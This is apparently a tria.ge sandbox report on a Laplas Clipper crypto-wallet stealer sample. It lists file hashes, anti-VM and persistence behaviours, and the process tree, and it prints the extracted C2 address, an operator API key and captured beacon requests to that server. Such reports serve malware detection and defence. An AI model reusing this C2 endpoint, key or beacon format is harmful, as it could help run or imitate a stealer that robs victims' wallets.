Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    139s
  • max time network
    154s
  • platform
    windows7_x64
  • resource
    win7-20230703-en
  • resource tags

    arch:x64arch:x86image:win7-20230703-enlocale:en-usos:windows7-x64system
  • submitted
    10/07/2023, 06:33 UTC

General

  • Target

    f2e100f576b44fdb37d874db2e48085c.exe

  • Size

    4.4MB

  • MD5

    f2e100f576b44fdb37d874db2e48085c

  • SHA1

    23091a0b5231d69d85866fede573b25577e20414

  • SHA256

    77530f67cff4fc2456c0b27abf28d1ab1f4f10fd9be039783adfa25ed1f7f196

  • SHA512

    14bd861a48f201a195d322e4c00f758996d2be8b6d78a1c927af53a00e029e9be7db4002c48a80f88d2869e9ba412724ec7a47c8da09faf79133df2edc608f85

  • SSDEEP

    98304:fqemq9DObUSOLZ27MJuUfg7Jb/0RCh2fc/xVzVALUx:PzD3SFEuUfcLwCh2Q/RAY

Malware Config

Extracted

Family

laplas

C2

http://lpls.tuktuk.ug

Attributes
  • api_key

    a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde

Signatures

  • Laplas Clipper

    Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f2e100f576b44fdb37d874db2e48085c.exe
    "C:\Users\Admin\AppData\Local\Temp\f2e100f576b44fdb37d874db2e48085c.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Loads dropped DLL
    • Adds Run key to start application
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of WriteProcessMemory
    PID:3064
    • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
      C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:2256

Network

  • flag-us
    DNS
    lpls.tuktuk.ug
    ntlhost.exe
    Remote address:
    8.8.8.8:53
    Request
    lpls.tuktuk.ug
    IN A
    Response
    lpls.tuktuk.ug
    IN A
    45.66.230.149
  • flag-nl
    GET
    http://lpls.tuktuk.ug/bot/regex
    ntlhost.exe
    Remote address:
    45.66.230.149:80
    Request
    GET /bot/regex HTTP/1.1
    Host: lpls.tuktuk.ug
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Mon, 10 Jul 2023 06:33:27 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 633
    Connection: keep-alive
  • flag-nl
    GET
    http://lpls.tuktuk.ug/bot/online?key=a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde&guid=KOSNGVQI\Admin
    ntlhost.exe
    Remote address:
    45.66.230.149:80
    Request
    GET /bot/online?key=a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde&guid=KOSNGVQI\Admin HTTP/1.1
    Host: lpls.tuktuk.ug
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Mon, 10 Jul 2023 06:33:28 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 2
    Connection: keep-alive
  • flag-nl
    GET
    http://lpls.tuktuk.ug/bot/regex
    ntlhost.exe
    Remote address:
    45.66.230.149:80
    Request
    GET /bot/regex HTTP/1.1
    Host: lpls.tuktuk.ug
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Mon, 10 Jul 2023 06:34:33 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 633
    Connection: keep-alive
  • flag-nl
    GET
    http://lpls.tuktuk.ug/bot/online?key=a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde&guid=KOSNGVQI\Admin
    ntlhost.exe
    Remote address:
    45.66.230.149:80
    Request
    GET /bot/online?key=a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde&guid=KOSNGVQI\Admin HTTP/1.1
    Host: lpls.tuktuk.ug
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Mon, 10 Jul 2023 06:34:33 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 2
    Connection: keep-alive
  • flag-nl
    GET
    http://lpls.tuktuk.ug/bot/regex
    ntlhost.exe
    Remote address:
    45.66.230.149:80
    Request
    GET /bot/regex HTTP/1.1
    Host: lpls.tuktuk.ug
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Mon, 10 Jul 2023 06:35:39 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 633
    Connection: keep-alive
  • flag-nl
    GET
    http://lpls.tuktuk.ug/bot/online?key=a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde&guid=KOSNGVQI\Admin
    ntlhost.exe
    Remote address:
    45.66.230.149:80
    Request
    GET /bot/online?key=a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde&guid=KOSNGVQI\Admin HTTP/1.1
    Host: lpls.tuktuk.ug
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Mon, 10 Jul 2023 06:35:39 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 2
    Connection: keep-alive
  • 45.66.230.149:80
    http://lpls.tuktuk.ug/bot/online?key=a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde&guid=KOSNGVQI\Admin
    http
    ntlhost.exe
    1.6kB
    4.3kB
    15
    20

    HTTP Request

    GET http://lpls.tuktuk.ug/bot/regex

    HTTP Response

    200

    HTTP Request

    GET http://lpls.tuktuk.ug/bot/online?key=a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde&guid=KOSNGVQI\Admin

    HTTP Response

    200

    HTTP Request

    GET http://lpls.tuktuk.ug/bot/regex

    HTTP Response

    200

    HTTP Request

    GET http://lpls.tuktuk.ug/bot/online?key=a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde&guid=KOSNGVQI\Admin

    HTTP Response

    200

    HTTP Request

    GET http://lpls.tuktuk.ug/bot/regex

    HTTP Response

    200

    HTTP Request

    GET http://lpls.tuktuk.ug/bot/online?key=a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde&guid=KOSNGVQI\Admin

    HTTP Response

    200
  • 8.8.8.8:53
    lpls.tuktuk.ug
    dns
    ntlhost.exe
    60 B
    76 B
    1
    1

    DNS Request

    lpls.tuktuk.ug

    DNS Response

    45.66.230.149

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

    Filesize

    743.4MB

    MD5

    3fbf49633fa76fe203f55b1cd98fe6ba

    SHA1

    3f8a742b348cbf8e09e2d12889ac81bcbc09b244

    SHA256

    3c50b55a724ee55cf876dc7f5feb3db45e568816e6fc4de799817d260b428e25

    SHA512

    a56b50ab9df26204cf1b78f19725351526bc93ba3b9286c473545c684e44c8341f0290ba4ce23a94f843ed2675a73e107ced8beb48e098698e0e2624ed5dcd48

  • \Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

    Filesize

    743.4MB

    MD5

    3fbf49633fa76fe203f55b1cd98fe6ba

    SHA1

    3f8a742b348cbf8e09e2d12889ac81bcbc09b244

    SHA256

    3c50b55a724ee55cf876dc7f5feb3db45e568816e6fc4de799817d260b428e25

    SHA512

    a56b50ab9df26204cf1b78f19725351526bc93ba3b9286c473545c684e44c8341f0290ba4ce23a94f843ed2675a73e107ced8beb48e098698e0e2624ed5dcd48

  • memory/2256-73-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-79-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-90-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-89-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-88-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-87-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-86-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-85-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-67-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-68-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-69-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-71-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-70-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-72-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-84-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-75-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-81-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-76-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-77-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-78-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-74-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/2256-80-0x0000000000960000-0x00000000012B5000-memory.dmp

    Filesize

    9.3MB

  • memory/3064-54-0x0000000000340000-0x0000000000C95000-memory.dmp

    Filesize

    9.3MB

  • memory/3064-58-0x0000000000340000-0x0000000000C95000-memory.dmp

    Filesize

    9.3MB

  • memory/3064-66-0x0000000000340000-0x0000000000C95000-memory.dmp

    Filesize

    9.3MB

  • memory/3064-55-0x0000000000340000-0x0000000000C95000-memory.dmp

    Filesize

    9.3MB

  • memory/3064-57-0x0000000000340000-0x0000000000C95000-memory.dmp

    Filesize

    9.3MB

  • memory/3064-60-0x0000000000340000-0x0000000000C95000-memory.dmp

    Filesize

    9.3MB

  • memory/3064-61-0x0000000000340000-0x0000000000C95000-memory.dmp

    Filesize

    9.3MB

  • memory/3064-59-0x0000000000340000-0x0000000000C95000-memory.dmp

    Filesize

    9.3MB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.